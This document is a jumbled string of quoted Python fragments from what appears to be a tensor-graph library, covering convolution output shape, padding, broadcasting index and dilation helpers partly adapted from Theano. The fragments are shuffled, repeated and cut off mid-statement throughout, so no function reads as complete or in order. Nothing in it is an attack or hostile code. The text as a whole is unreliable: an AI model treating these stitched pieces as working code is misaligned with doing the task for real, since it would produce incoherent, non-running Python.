image shape on the", "len(var.shape) assert len(strides) == n out_shape = () nz_indices = () shape_idx =", "elements respectively correspond to the subsampling on height and width (and possibly depth)", "1: idx = pm.index(0, node_b.shape[i] - 1) if zero_indices: a_idx.append(0) # TESTING b_idx.append(idx)", "down. pad_right : int Padding size on right. \"\"\" # pad_h = pad_w", "pad_w = pad_size[1] * 2 # elif len(pad_size) == 4: # return pad_size[0],", "pad_top, pad_left, pad_h - pad_top, pad_w - pad_left def get_pad_tuple(padding, kernel): \"\"\"Common code", "f\"Output shape value {s} not in other shapes\" idx = node_b.shape.index(s) all_ops.append(idx) return", "== \"valid\": pad_l = pad_r = 0 else: assert border_mode >= 0 pad_l", "pm.index(0, s - 1) out_idx.append(idx) if s in node_a.shape: start = 0 if", "channels, height and width of the image. \"\"\" bsize, imshp = image_shape[0], image_shape[2:]", "s - 1) for s in shape]) return indices def _get_reduce_node_indices(a, b, output,", "_get_single_node_indices(node_a) return indices, indices, indices elif node_a.shape == pm.DEFAULT_SHAPES[0] and node_b.shape == pm.DEFAULT_SHAPES[0]:", "= pm.temp(name=name, shape=out_shape) padded[shape_idx] = 0 padded[(shape_idx[0])] = 0 # def get_pad_tuple(pad_size): #", "node_a.shape: if i == 1: op1.append(0) # all_ops.append(0) else: idx = pm.index(0, i", "pad_size[0], pad_size[2], pad_size[1], pad_size[3] # else: # raise ValueError(\"Size of padding can only", "-len(lg_node.shape) - 1, -1): if len(small_node.shape) < abs(i): idx = pm.index(0, lg_node.shape[i] -", "() nz_indices = () shape_idx = () for i in range(n): out_shape +=", "filter_dilation[i], ) for i in range(len(subsample)) ) else: out_shp = tuple( _get_conv_shape_1axis( imshp[i],", "n out_shape = () nz_indices = () shape_idx = () for i in", "= {} b_map = {} for s in node_c.shape: idx = pm.index(0, s", "= padding[1] * 2 pad_top = (pad_h + 1) // 2 pad_left =", "+ 1,) nz_indices += (pm.index(0, out_shape[i] - 1, stride=strides[i]),) shape_idx += (pm.index(0, out_shape[i]", "# return pad_size[0], pad_size[2], pad_size[1], pad_size[3] # else: # raise ValueError(\"Size of padding", "a_map = {} b_map = {} for s in node_c.shape: idx = pm.index(0,", "to the kernel shape. For a normal convolution, its four (for 2D convolution)", "if len(small_node.shape) < abs(i): idx = pm.index(0, lg_node.shape[i] - 1) nmap[\"large\"].append(idx) out_idx.append(idx) elif", "of int corresponding to the output image shape. Its four element must correspond", "data.shape[1]-1) oh_idx = pm.index(0, oh-1) ih_idx = pm.index(0, data.shape[2]-1) ow_idx = pm.index(0, ow-1)", "= sidx if s in node_b.shape: start = 0 if s in b_map:", "out_node): # TODO: Figure out what to do about multiple dimensions with the", "Parameters ---------- image_shape: tuple of int corresponding to the input image shape. Its", "to the subsampling on height and width (and possibly depth) axis. filter_dilation: tuple", "+ 1 out_shp = image_shape - dil_kernel_shape if pad_l != 0: out_shp +=", "tuple(indices) for idx, i in enumerate(all_indices): if len(node.shape) > idx and tgt_shape[idx] ==", "pm.DEFAULT_SHAPES[0]: return tuple([]) else: if not shape: shape = node.shape indices = tuple([pm.index(0,", "width (and possibly depth) of the image. None where undefined. kernel_shape: tuple of", "pad_top = (pad_h + 1) // 2 # pad_left = (pad_w + 1)", "what to do about multiple dimensions with the same value cnt = 0", "b_idx = [None] * len(node_b.shape) a_map = {} b_map = {} for s", "b_idx.append(idx) out_idx.append(idx) elif node_a.shape[i] == 1: idx = pm.index(0, node_b.shape[i] - 1) if", "dim idx = pm.index(0, x.shape[dim] - 1) return idx def _dim_explicit(a_shp, dim): if", "For a normal convolution, its four (for 2D convolution) or five (for 3D", "- 2 nkern, kshp = kernel_shape[0], kernel_shape[-convdim:] if isinstance(border_mode, tuple): out_shp = tuple(", "= _get_single_node_indices(node_a) return indices, indices, indices elif node_a.shape == pm.DEFAULT_SHAPES[0] and node_b.shape ==", "return indices, idx, indices if len(node_a.shape) > len(node_b.shape): small_node = node_b lg_node =", "idx = pm.index(0, node_b.shape[i] - 1) if zero_indices: a_idx.append(0) # TESTING b_idx.append(idx) out_idx.append(idx)", "possibly depth) axis. filter_dilation: tuple of int. Its two or three elements correspond", "it is a tuple, its two (or three) elements respectively correspond to the", "pm.index(0, node_a.shape[i] - 1) a_idx.append(idx) if zero_indices: b_idx.append(0) # TESTING out_idx.append(idx) else: raise", "p_top + p_bottom ow = data.shape[3] + p_left + p_right padded_shape = (data.shape[0],", "to the subsampling on the considered axis. dilation: int. It must correspond to", "f\"Unequal shapes for padding:\\n\" \\ f\"Target shape: {padded_shape}\\n\" \\ f\"Set shape: {padded_out.shape}\" padded_out.set_shape(padded_shape)", "the output image shape. Its four element must correspond respectively to: batch size,", "be 'valid' or 'full'. If it is a tuple, its two (or three)", "pm.index(0, lg_node.shape[i] - 1) nmap[\"large\"].append(idx) out_idx.append(idx) elif node_a.shape[i] == node_b.shape[i]: if node_a.shape[i] !=", "of symbolic shape, we want to build the smallest graph # (image_shape +", "out_idx.append(idx) elif node_a.shape[i] == node_b.shape[i]: if node_a.shape[i] != 1: idx = pm.index(0, node_a.shape[i]", "subsample out_shp = out_shp + 1 return out_shp def _get_conv_output_shape( image_shape, kernel_shape, border_mode,", "ih_idx = pm.index(0, data.shape[2]-1) ow_idx = pm.index(0, ow-1) iw_idx = pm.index(0, data.shape[3] -", "ow = data.shape[3] + p_left + p_right padded_shape = (data.shape[0], data.shape[1], oh, ow)", "node_a.shape.index(s) all_ops.append(idx) else: assert s in node_b.shape, f\"Output shape value {s} not in", "if i != tgt_shape[idx]: indices.insert(idx, 0) return tuple(indices) def _get_binop_idx(node_a, node_b, out_node): #", "< dim idx = pm.index(0, x.shape[dim] - 1) return idx def _dim_explicit(a_shp, dim):", "# Implicit dilated kernel shape dil_kernel_shape = (kernel_shape - 1) * dilation +", "if subsample != 1: out_shp = out_shp // subsample out_shp = out_shp +", ": number of output channels, height and width of the output, number of", "= pad_size * 2 # # pad_top = (pad_h + 1) // 2", "_get_conv_shape_1axis( imshp[i], kshp[i], border_mode[i], subsample[i], filter_dilation[i], ) for i in range(len(subsample)) ) else:", "return tuple([]) else: if not shape: shape = node.shape indices = tuple([pm.index(0, s", "correspond to the subsampling on height and width (and possibly depth) axis. filter_dilation:", "of the kernel. For an unshared 2D convolution, its six channels must correspond", "node_a lg_node = node_b nmap[\"small\"] = a_idx nmap[\"large\"] = b_idx for i in", "op2.append(op1[idx]) elif i == 1: op2.append(0) # all_ops.append(0) else: idx = pm.index(0, i", "strides, name=None): n = len(var.shape) assert len(strides) == n out_shape = () nz_indices", "= node_a.shape.index(i) op2.append(op1[idx]) elif i == 1: op2.append(0) # all_ops.append(0) else: idx =", "\"\"\"This function compute the output shape of convolution operation. Copied and simplified from", "def _get_indices_for_dim(x, dim): assert len(x.shape) < dim idx = pm.index(0, x.shape[dim] - 1)", "STEP 0: idx3*1 + 0 # STEP 1: idx3 + shape[3]* for dc", "else: raise RuntimeError(f\"Unable to broadcast indices:\\n\" f\"{node_a.name}: {node_a.shape}\\n\" f\"{node_b.name}: {node_b.shape}\\n\") return format_idx(a_idx, reverse),", "str Padding size, or ['VALID', 'SAME'] kernel : tuple of int Conv kernel", "shapes\" idx = node_b.shape.index(s) all_ops.append(idx) return op1, op2, all_ops def _get_single_node_indices(node, shape=None): if", "0) return tuple(indices) def _get_binop_idx(node_a, node_b, out_node): # TODO: Figure out what to", "get_pad_tuple(padding, kernel): \"\"\"Common code to get the pad option Parameters ---------- padding :", "width (and possibly depth) of the kernel. For an unshared 2D convolution, its", "= 0 # def get_pad_tuple(pad_size): # if isinstance(pad_size, (tuple, list)): # if len(pad_size)", "or tuple of int. If it is a string, it must be 'valid'", "nmap[\"large\"].append(idx) out_idx.append(idx) elif node_a.shape[i] == node_b.shape[i]: if node_a.shape[i] != 1: idx = pm.index(0,", "size on left pad_down : int Padding size on down. pad_right : int", "for dc in reversed(dim_combinations): idx = 0 idx_offset = 1 add_dim = 0", "(and possibly depth) axis. filter_dilation: tuple of int. Its two or three elements", "[] op2 = [] all_ops = [] for i in node_a.shape: if i", "node.shape == pm.DEFAULT_SHAPES[0]: return tuple([]) else: if not shape: shape = node.shape indices", "iw_idx + p_left)] = data[(n_idx, c_idx, ih_idx, iw_idx)] return padded_out def reshape_node(data: pm.Node,", "in node_b.shape, f\"Output shape value {s} not in other shapes\" idx = node_b.shape.index(s)", "# raise ValueError(\"Size of padding can only be 2 or 4\") # else:", "4\") # else: # assert isinstance(pad_size, int) # pad_h = pad_w = pad_size", "1 if border_mode == \"full\": pad_l = pad_r = dil_kernel_shape - 1 elif", "= (pad_w + 1) // 2 # return pad_top, pad_left, pad_h - pad_top,", "indices.insert(idx, 0) return tuple(indices) def _get_binop_idx(node_a, node_b, out_node): # TODO: Figure out what", "---------- image_shape: tuple of int corresponding to the input image shape. Its four", "i != tgt_shape[idx]: indices.insert(idx, 0) return tuple(indices) def _get_binop_idx(node_a, node_b, out_node): # TODO:", "int or str Padding size, or ['VALID', 'SAME'] kernel : tuple of int", "out_shape[i] - 1, stride=strides[i]),) shape_idx += (pm.index(0, out_shape[i] - 1),) padded = pm.temp(name=name,", "filter_dilation=(0, 0) ): \"\"\"This function compute the output shape of convolution operation. Copied", "return pad_top, pad_left, pad_h - pad_top, pad_w - pad_left def pad_node(data: pm.Node, padded_out:", "node_a.shape == pm.DEFAULT_SHAPES[0] and node_b.shape == pm.DEFAULT_SHAPES[0]: idx = format_idx([]) return idx, idx,", "filter_dilation: tuple of int. Its two or three elements correspond respectively to the", "== 4 p_top, p_bottom, p_left, p_right = get_pad_tuple(pad_size, kernel) oh = data.shape[2] +", "elif node_b.shape == pm.DEFAULT_SHAPES[0]: idx = format_idx([]) indices = _get_single_node_indices(node_a) return indices, idx,", "undefined. border_mode: string, or tuple of int. If it is a string, it", "Padding size on top pad_left : int Padding size on left pad_down :", "def is_broadcastable(shp1, shp2): for a, b in zip(shp1[::-1], shp2[::-1]): if a == 1", "int Padding size on left pad_down : int Padding size on down. pad_right", "pad_w - pad_left def pad_node(data: pm.Node, padded_out: pm.Node, pad_size, kernel, pad_val=0): assert len(data.shape)", "size, number of output channels, height and width of the image. \"\"\" bsize,", "out_shp += pad_r if subsample != 1: out_shp = out_shp // subsample out_shp", "+= 1 if out_node.is_shape_finalized(): all_ops = [] for s in out_node.shape: if s", "a_idx else: small_node = node_a lg_node = node_b nmap[\"small\"] = a_idx nmap[\"large\"] =", "on the considered axis. Returns ------- out_shp: int corresponding to the output image", "pm.DEFAULT_SHAPES[0]: return tuple([]) else: if not output.shape: raise RuntimeError indices = tuple([pm.index(0, s", "indices, idx, indices if len(node_a.shape) > len(node_b.shape): small_node = node_b lg_node = node_a", "function compute the output shape of convolution operation. Copied and simplified from theano", "all_ops.append(0) else: idx = pm.index(0, i - 1) op2.append(idx) all_ops.append(idx) cnt += 1", "0: dim = len(a_shp) + dim return dim def _get_conv_shape_1axis( image_shape, kernel_shape, border_mode,", "same value cnt = 0 op1 = [] op2 = [] all_ops =", "indices = _get_single_node_indices(node_b) return idx, indices, indices elif node_b.shape == pm.DEFAULT_SHAPES[0]: idx =", "in reversed(dc): idx = src_indices[d]*idx_offset + add_dim idx_offset = data.shape[d] def _get_indices_for_dim(x, dim):", "output, number of input channels, height and width of the kernel. None where", "elif node_a.shape[i] == node_b.shape[i]: if node_a.shape[i] != 1: idx = pm.index(0, node_a.shape[i] -", "the subsampling on height and width (and possibly depth) axis. filter_dilation: tuple of", "ow-1) iw_idx = pm.index(0, data.shape[3] - 1) padded_out[(n_idx, c_idx, oh_idx, ow_idx)] = pad_val", "idx def _dim_explicit(a_shp, dim): if dim is None: return dim if dim <", "image. \"\"\" bsize, imshp = image_shape[0], image_shape[2:] convdim = len(image_shape) - 2 nkern,", "the smallest graph # (image_shape + 2 * pad - dil_kernel_shape) // subsample", "image_shape, kernel_shape, border_mode, subsample, dilation=1 ): \"\"\"This function compute the output shape of", "+= pad_l if pad_r != 0: out_shp += pad_r if subsample != 1:", "reverse), format_idx(b_idx, reverse), format_idx(out_idx, reverse) def dilate(var: pm.placeholder, strides, name=None): n = len(var.shape)", "else: small_node = node_a lg_node = node_b nmap[\"small\"] = a_idx nmap[\"large\"] = b_idx", "None: assert node_a.shape[i] == 1 a_idx[i] = 0 for i in range(len(b_idx)): if", "padded_out.shape != (1,): assert padded_shape == padded_out.shape, f\"Unequal shapes for padding:\\n\" \\ f\"Target", "s in node_a.shape: start = 0 if s in a_map: start = a_map[s]", "node_b, node_c, zero_indices=True): broadcastable = is_broadcastable(node_a.shape, node_b.shape) a_idx = [] b_idx = []", "elif border_mode == \"valid\": pad_l = pad_r = 0 else: assert border_mode >=", "of the image. None where undefined. kernel_shape: tuple of int corresponding to the", "in zip(shp1[::-1], shp2[::-1]): if a == 1 or b == 1 or a", "[] out_idx = [] nmap = {} reverse = True if not broadcastable:", "input channels, height and width (and possibly depth) of the image. None where", "= (pad_h + 1) // 2 pad_left = (pad_w + 1) // 2", "it must be 'valid' or 'full'. If it is a tuple, its two", "None: assert node_b.shape[i] == 1 b_idx[i] = 0 else: if node_a.shape == node_b.shape", "tuple([]) else: if not shape: shape = node.shape indices = tuple([pm.index(0, s -", "(and possibly depth) of the image. None where undefined. kernel_shape: tuple of int", "to the input image shape on a given axis. kernel_shape: int Corresponds to", "node_a.shape: start = 0 if s in a_map: start = a_map[s] sidx =", "for idx, i in enumerate(node.shape): if i != tgt_shape[idx]: indices.insert(idx, 0) return tuple(indices)", "idx a_map[s] = sidx if s in node_b.shape: start = 0 if s", "idx, i in enumerate(all_indices): if len(node.shape) > idx and tgt_shape[idx] == node.shape[idx]: indices.append(i)", "tuple(indices) def _get_binop_idx(node_a, node_b, out_node): # TODO: Figure out what to do about", "= pad_r = border_mode # In case of symbolic shape, we want to", "with the same value cnt = 0 op1 = [] op2 = []", "or 'full'. subsample: int. It must correspond to the subsampling on the considered", "indices, indices elif node_a.shape == pm.DEFAULT_SHAPES[0] and node_b.shape == pm.DEFAULT_SHAPES[0]: idx = format_idx([])", "n = len(var.shape) assert len(strides) == n out_shape = () nz_indices = ()", "for i in range(len(subsample)) ) else: out_shp = tuple( _get_conv_shape_1axis( imshp[i], kshp[i], border_mode,", "= [None] * len(node_a.shape) b_idx = [None] * len(node_b.shape) a_map = {} b_map", "len(node_a.shape) > len(node_b.shape): small_node = node_b lg_node = node_a nmap[\"small\"] = b_idx nmap[\"large\"]", "shape on a given axis. kernel_shape: int Corresponds to the kernel shape on", "* 2 # elif len(pad_size) == 4: # return pad_size[0], pad_size[2], pad_size[1], pad_size[3]", "{} for s in node_c.shape: idx = pm.index(0, s - 1) out_idx.append(idx) if", "p_right = get_pad_tuple(pad_size, kernel) oh = data.shape[2] + p_top + p_bottom ow =", "= pad_w = pad_size * 2 # # pad_top = (pad_h + 1)", "Padding size on left pad_down : int Padding size on down. pad_right :", "len(node_b.shape) a_map = {} b_map = {} for s in node_c.shape: idx =", "start = b_map[s] sidx = node_b.shape.index(s, start) b_idx[sidx] = idx b_map[s] = sidx", "Its two or three elements respectively correspond to the subsampling on height and", "0 # def get_pad_tuple(pad_size): # if isinstance(pad_size, (tuple, list)): # if len(pad_size) ==", "small_node = node_a lg_node = node_b nmap[\"small\"] = a_idx nmap[\"large\"] = b_idx for", "indices = tuple([pm.index(0, s - 1) for s in output.shape]) return indices def", "format_idx(a_idx, reverse), format_idx(b_idx, reverse), format_idx(out_idx, reverse) def dilate(var: pm.placeholder, strides, name=None): n =", "0 pad_l = pad_r = border_mode # In case of symbolic shape, we", "for s in data.shape: idx = pm.index(0, s-1) src_indices.append(idx) # STEP 0: idx3*1", "six channels must correspond to : number of output channels, height and width", "int. Its two or three elements respectively correspond to the subsampling on height", "return tuple([]) else: if not output.shape: raise RuntimeError indices = tuple([pm.index(0, s -", "// 2 # return pad_top, pad_left, pad_h - pad_top, pad_w - pad_left def", "= kernel_shape[0], kernel_shape[-convdim:] if isinstance(border_mode, tuple): out_shp = tuple( _get_conv_shape_1axis( imshp[i], kshp[i], border_mode[i],", "() for i in range(n): out_shape += ((var.shape[i] - 1) * strides[i] +", "# pad_h = pad_size[0] * 2 # pad_w = pad_size[1] * 2 #", "(pad_h + 1) // 2 pad_left = (pad_w + 1) // 2 return", "image_shape[2:] convdim = len(image_shape) - 2 nkern, kshp = kernel_shape[0], kernel_shape[-convdim:] if isinstance(border_mode,", "of output channels, height and width of the output, number of input channels,", "== padded_out.shape, f\"Unequal shapes for padding:\\n\" \\ f\"Target shape: {padded_shape}\\n\" \\ f\"Set shape:", "to : number of output channels, height and width of the output, number", "kernel. None where undefined. border_mode: string, or tuple of int. If it is", "smallest graph # (image_shape + 2 * pad - dil_kernel_shape) // subsample +", "not shape: shape = node.shape indices = tuple([pm.index(0, s - 1) for s", "# pad_w = pad_size[1] * 2 # elif len(pad_size) == 4: # return", "depth) axis. subsample: tuple of int. Its two or three elements respectively correspond", "out_idx.append(idx) else: raise RuntimeError(f\"Unable to broadcast indices:\\n\" f\"{node_a.name}: {node_a.shape}\\n\" f\"{node_b.name}: {node_b.shape}\\n\") return format_idx(a_idx,", "[] for i in node_a.shape: if i == 1: op1.append(0) # all_ops.append(0) else:", "- 1 elif border_mode == \"valid\": pad_l = pad_r = 0 else: assert", "= node_b lg_node = node_a nmap[\"small\"] = b_idx nmap[\"large\"] = a_idx else: small_node", "+ p_left)] = data[(n_idx, c_idx, ih_idx, iw_idx)] return padded_out def reshape_node(data: pm.Node, reshaped_out:", "1: op1.append(0) # all_ops.append(0) else: idx = pm.index(0, i - 1) op1.append(idx) all_ops.append(idx)", "subsample, dilation=1 ): \"\"\"This function compute the output shape of convolution operation. Copied", "or five (for 3D convolution) elements must correspond respectively to : number of", "tuple([pm.index(0, s - 1) for s in shape]) return indices def _get_reduce_node_indices(a, b,", "in node_a.shape: start = 0 if s in a_map: start = a_map[s] sidx", "(or three) elements respectively correspond to the padding on height and width (and", "out_shp = tuple( _get_conv_shape_1axis( imshp[i], kshp[i], border_mode, subsample[i], filter_dilation[i] ) for i in", "reverse) def dilate(var: pm.placeholder, strides, name=None): n = len(var.shape) assert len(strides) == n", "on a given axis. border_mode: string or int. If it is a string,", "pm.index(0, data.shape[0]-1) c_idx = pm.index(0, data.shape[1]-1) oh_idx = pm.index(0, oh-1) ih_idx = pm.index(0,", "the pad option Parameters ---------- padding : int or str Padding size, or", "indices:\\n\" f\"{node_a.name}: {node_a.shape}\\n\" f\"{node_b.name}: {node_b.shape}\\n\") return format_idx(a_idx, reverse), format_idx(b_idx, reverse), format_idx(out_idx, reverse) def", "border_mode == \"full\": pad_l = pad_r = dil_kernel_shape - 1 elif border_mode ==", "is_broadcastable(node_a.shape, node_b.shape) a_idx = [] b_idx = [] out_idx = [] nmap =", "for d in reversed(dc): idx = src_indices[d]*idx_offset + add_dim idx_offset = data.shape[d] def", "shape: tuple, dim_combinations): assert np.prod(data.shape) == np.prod(shape) assert len(dim_combinations) == len(shape) src_indices =", "Its four element must correspond respectively to: batch size, number of output channels,", "if a_idx[i] is None: assert node_a.shape[i] == 1 a_idx[i] = 0 for i", "all_ops = [] for i in node_a.shape: if i == 1: op1.append(0) #", "idx = node_b.shape.index(s) all_ops.append(idx) return op1, op2, all_ops def _get_single_node_indices(node, shape=None): if node.shape", "s in shape]) return indices def _get_reduce_node_indices(a, b, output, axis): if output.shape ==", "a_idx.append(idx) b_idx.append(idx) out_idx.append(idx) elif node_a.shape[i] == 1: idx = pm.index(0, node_b.shape[i] - 1)", "'full'. subsample: int. It must correspond to the subsampling on the considered axis.", "border_mode == \"valid\": pad_l = pad_r = 0 else: assert border_mode >= 0", "pad_size[2], pad_size[1], pad_size[3] # else: # raise ValueError(\"Size of padding can only be", "node_a.shape == pm.DEFAULT_SHAPES[0]: idx = format_idx([]) indices = _get_single_node_indices(node_b) return idx, indices, indices", "node_a.shape[i] == 1 a_idx[i] = 0 for i in range(len(b_idx)): if b_idx[i] is", "we want to build the smallest graph # (image_shape + 2 * pad", "= pm.index(0, oh-1) ih_idx = pm.index(0, data.shape[2]-1) ow_idx = pm.index(0, ow-1) iw_idx =", "_get_single_node_indices(node_b) return idx, indices, indices elif node_b.shape == pm.DEFAULT_SHAPES[0]: idx = format_idx([]) indices", "of int. Its two or three elements correspond respectively to the dilation on", "if not shape: shape = node.shape indices = tuple([pm.index(0, s - 1) for", "# (image_shape + 2 * pad - dil_kernel_shape) // subsample + 1 out_shp", "size, number of input channels, height and width (and possibly depth) of the", "correspond to the subsampling on the considered axis. dilation: int. It must correspond", "{s} not in other shapes\" idx = node_b.shape.index(s) all_ops.append(idx) return op1, op2, all_ops", "f\"{node_b.name}: {node_b.shape}\\n\") return format_idx(a_idx, reverse), format_idx(b_idx, reverse), format_idx(out_idx, reverse) def dilate(var: pm.placeholder, strides,", "get the pad option Parameters ---------- padding : int or str Padding size,", "height and width of the image. \"\"\" bsize, imshp = image_shape[0], image_shape[2:] convdim", "else: assert s in node_b.shape, f\"Output shape value {s} not in other shapes\"", "= 0 if s in a_map: start = a_map[s] sidx = node_a.shape.index(s, start)", "pm.DEFAULT_SHAPES[0] and node_b.shape == pm.DEFAULT_SHAPES[0]: idx = format_idx([]) return idx, idx, idx elif", "stride=strides[i]),) shape_idx += (pm.index(0, out_shape[i] - 1),) padded = pm.temp(name=name, shape=out_shape) padded[shape_idx] =", "multiple dimensions with the same value cnt = 0 op1 = [] op2", "shape, we want to build the smallest graph # (image_shape + 2 *", "= padding * 2 pad_h = padding[0] * 2 pad_w = padding[1] *", "_get_indices(node, all_indices, tgt_shape): indices = [] if node.shape == pm.DEFAULT_SHAPES[0]: return tuple(indices) for", "# In case of symbolic shape, we want to build the smallest graph", "symbolic shape, we want to build the smallest graph # (image_shape + 2", "correspond to : number of output channels, height and width of the output,", "width of the kernel. None where undefined. border_mode: string, or tuple of int.", "node_b.shape: start = 0 if s in b_map: start = b_map[s] sidx =", "on the considered axis. \"\"\" # Implicit dilated kernel shape dil_kernel_shape = (kernel_shape", "of int corresponding to the kernel shape. For a normal convolution, its four", "2 pad_left = (pad_w + 1) // 2 return pad_top, pad_left, pad_h -", "a string, it must be 'valid' or 'full'. subsample: int. It must correspond", "2 return pad_top, pad_left, pad_h - pad_top, pad_w - pad_left def pad_node(data: pm.Node,", "assert padded_shape == padded_out.shape, f\"Unequal shapes for padding:\\n\" \\ f\"Target shape: {padded_shape}\\n\" \\", "node_b.shape: if i in node_a.shape: idx = node_a.shape.index(i) op2.append(op1[idx]) elif i == 1:", "height and width axis. Returns ------- output_shape: tuple of int corresponding to the", "= pm.index(0, data.shape[1]-1) oh_idx = pm.index(0, oh-1) ih_idx = pm.index(0, data.shape[2]-1) ow_idx =", "output image shape. Its four element must correspond respectively to: batch size, number", "# return pad_top, pad_left, pad_h - pad_top, pad_w - pad_left def get_pad_tuple(padding, kernel):", "a given axis. kernel_shape: int Corresponds to the kernel shape on a given", "pad_left = (pad_w + 1) // 2 return pad_top, pad_left, pad_h - pad_top,", "(pm.index(0, out_shape[i] - 1, stride=strides[i]),) shape_idx += (pm.index(0, out_shape[i] - 1),) padded =", "+ add_dim idx_offset = data.shape[d] def _get_indices_for_dim(x, dim): assert len(x.shape) < dim idx", "return indices, indices, indices elif node_a.shape == pm.DEFAULT_SHAPES[0] and node_b.shape == pm.DEFAULT_SHAPES[0]: idx", "= data.shape[d] def _get_indices_for_dim(x, dim): assert len(x.shape) < dim idx = pm.index(0, x.shape[dim]", "idx = 0 idx_offset = 1 add_dim = 0 for d in reversed(dc):", "and node_b.shape == pm.DEFAULT_SHAPES[0]: idx = format_idx([]) return idx, idx, idx elif node_a.shape", "a_idx[i] is None: assert node_a.shape[i] == 1 a_idx[i] = 0 for i in", "depth) axis. filter_dilation: tuple of int. Its two or three elements correspond respectively", "channels must correspond to : number of output channels, height and width of", "// 2 # pad_left = (pad_w + 1) // 2 # return pad_top,", "string, it must be 'valid' or 'full'. subsample: int. It must correspond to", "i in enumerate(node.shape): if i != tgt_shape[idx]: indices.insert(idx, 0) return tuple(indices) def _get_binop_idx(node_a,", "= pm.index(0, node_a.shape[i] - 1) a_idx.append(idx) if zero_indices: b_idx.append(0) # TESTING out_idx.append(idx) else:", "pad_size, kernel, pad_val=0): assert len(data.shape) == 4 p_top, p_bottom, p_left, p_right = get_pad_tuple(pad_size,", "False return True # Use numpy broadcasting rules def _get_elem_indices(node_a, node_b, node_c, zero_indices=True):", "= pm.index(0, data.shape[2]-1) ow_idx = pm.index(0, ow-1) iw_idx = pm.index(0, data.shape[3] - 1)", "= (kernel_shape - 1) * dilation + 1 if border_mode == \"full\": pad_l", "None: return dim if dim < 0: dim = len(a_shp) + dim return", "a normal convolution, its four (for 2D convolution) or five (for 3D convolution)", "= node.shape indices = tuple([pm.index(0, s - 1) for s in shape]) return", "elif node_a.shape[i] == 1: idx = pm.index(0, node_b.shape[i] - 1) if zero_indices: a_idx.append(0)", "// subsample + 1 out_shp = image_shape - dil_kernel_shape if pad_l != 0:", "- dil_kernel_shape if pad_l != 0: out_shp += pad_l if pad_r != 0:", "ih_idx + p_top, iw_idx + p_left)] = data[(n_idx, c_idx, ih_idx, iw_idx)] return padded_out", "for i in node_a.shape: if i == 1: op1.append(0) # all_ops.append(0) else: idx", "its four (for 2D convolution) or five (for 3D convolution) elements must correspond", "- 1) op1.append(idx) all_ops.append(idx) cnt += 1 for i in node_b.shape: if i", "padded_out.set_shape(padded_shape) n_idx = pm.index(0, data.shape[0]-1) c_idx = pm.index(0, data.shape[1]-1) oh_idx = pm.index(0, oh-1)", "elif node_a.shape == pm.DEFAULT_SHAPES[0] and node_b.shape == pm.DEFAULT_SHAPES[0]: idx = format_idx([]) return idx,", "[] if node.shape == pm.DEFAULT_SHAPES[0]: return tuple(indices) for idx, i in enumerate(all_indices): if", "(pm.index(0, out_shape[i] - 1),) padded = pm.temp(name=name, shape=out_shape) padded[shape_idx] = 0 padded[(shape_idx[0])] =", "width axis. Returns ------- output_shape: tuple of int corresponding to the output image", "its two (or three) elements respectively correspond to the padding on height and", "border_mode, subsample, dilation=1 ): \"\"\"This function compute the output shape of convolution operation.", "= node_a lg_node = node_b nmap[\"small\"] = a_idx nmap[\"large\"] = b_idx for i", "idx_offset = data.shape[d] def _get_indices_for_dim(x, dim): assert len(x.shape) < dim idx = pm.index(0,", "if dim is None: return dim if dim < 0: dim = len(a_shp)", "raise RuntimeError indices = tuple([pm.index(0, s - 1) for s in output.shape]) return", "- 1) for s in output.shape]) return indices def is_broadcastable(shp1, shp2): for a,", "input image shape. Its four (or five) element must correspond respectively to: batch", "- 1) padded_out[(n_idx, c_idx, oh_idx, ow_idx)] = pad_val padded_out[(n_idx, c_idx, ih_idx + p_top,", "def _get_conv_shape_1axis( image_shape, kernel_shape, border_mode, subsample, dilation=1 ): \"\"\"This function compute the output", "input channels, height and width (and possibly depth) of the kernel. For an", "(and possibly depth) of the kernel. For an unshared 2D convolution, its six", "== node.shape[idx]: indices.append(i) if tgt_shape != node.shape: for idx, i in enumerate(node.shape): if", "on height and width axis. Returns ------- output_shape: tuple of int corresponding to", "size on down. pad_right : int Padding size on right. \"\"\" # pad_h", "node_b nmap[\"small\"] = a_idx nmap[\"large\"] = b_idx for i in range(-1, -len(lg_node.shape) -", "a_idx[sidx] = idx a_map[s] = sidx if s in node_b.shape: start = 0", "int. Its two or three elements correspond respectively to the dilation on height", "else: if node_a.shape == node_b.shape and node_c.shape == node_a.shape: indices = _get_single_node_indices(node_a) return", "pm.DEFAULT_SHAPES[0]: idx = format_idx([]) return idx, idx, idx elif node_a.shape == pm.DEFAULT_SHAPES[0]: idx", "on left pad_down : int Padding size on down. pad_right : int Padding", "nz_indices += (pm.index(0, out_shape[i] - 1, stride=strides[i]),) shape_idx += (pm.index(0, out_shape[i] - 1),)", "int) # pad_h = pad_w = pad_size * 2 # # pad_top =", "if zero_indices: a_idx.append(0) # TESTING b_idx.append(idx) out_idx.append(idx) elif node_b.shape[i] == 1: idx =", "kernel_shape: tuple of int corresponding to the kernel shape. For a normal convolution,", "correspond to the dilation on the considered axis. Returns ------- out_shp: int corresponding", "is None: assert node_b.shape[i] == 1 b_idx[i] = 0 else: if node_a.shape ==", "out_shp = image_shape - dil_kernel_shape if pad_l != 0: out_shp += pad_l if", "to the input image shape. Its four (or five) element must correspond respectively", "_get_indices_for_dim(x, dim): assert len(x.shape) < dim idx = pm.index(0, x.shape[dim] - 1) return", "+= (pm.index(0, out_shape[i] - 1, stride=strides[i]),) shape_idx += (pm.index(0, out_shape[i] - 1),) padded", "all_ops.append(idx) cnt += 1 if out_node.is_shape_finalized(): all_ops = [] for s in out_node.shape:", "is a string, it must be 'valid' or 'full'. subsample: int. It must", "= pm.index(0, x.shape[dim] - 1) return idx def _dim_explicit(a_shp, dim): if dim is", "0 idx_offset = 1 add_dim = 0 for d in reversed(dc): idx =", "considered axis. Returns ------- out_shp: int corresponding to the output image shape on", "pad_val=0): assert len(data.shape) == 4 p_top, p_bottom, p_left, p_right = get_pad_tuple(pad_size, kernel) oh", "cnt += 1 for i in node_b.shape: if i in node_a.shape: idx =", "s - 1) out_idx.append(idx) if s in node_a.shape: start = 0 if s", "= out_shp // subsample out_shp = out_shp + 1 return out_shp def _get_conv_output_shape(", "padded_out def reshape_node(data: pm.Node, reshaped_out: pm.Node, shape: tuple, dim_combinations): assert np.prod(data.shape) == np.prod(shape)", "kernel_shape, border_mode, subsample, dilation=1 ): \"\"\"This function compute the output shape of convolution", "four (for 2D convolution) or five (for 3D convolution) elements must correspond respectively", "= out_shp + 1 return out_shp def _get_conv_output_shape( image_shape, kernel_shape, border_mode, subsample, filter_dilation=(0,", "of convolution operation. Copied and simplified from theano (2020/11/08): 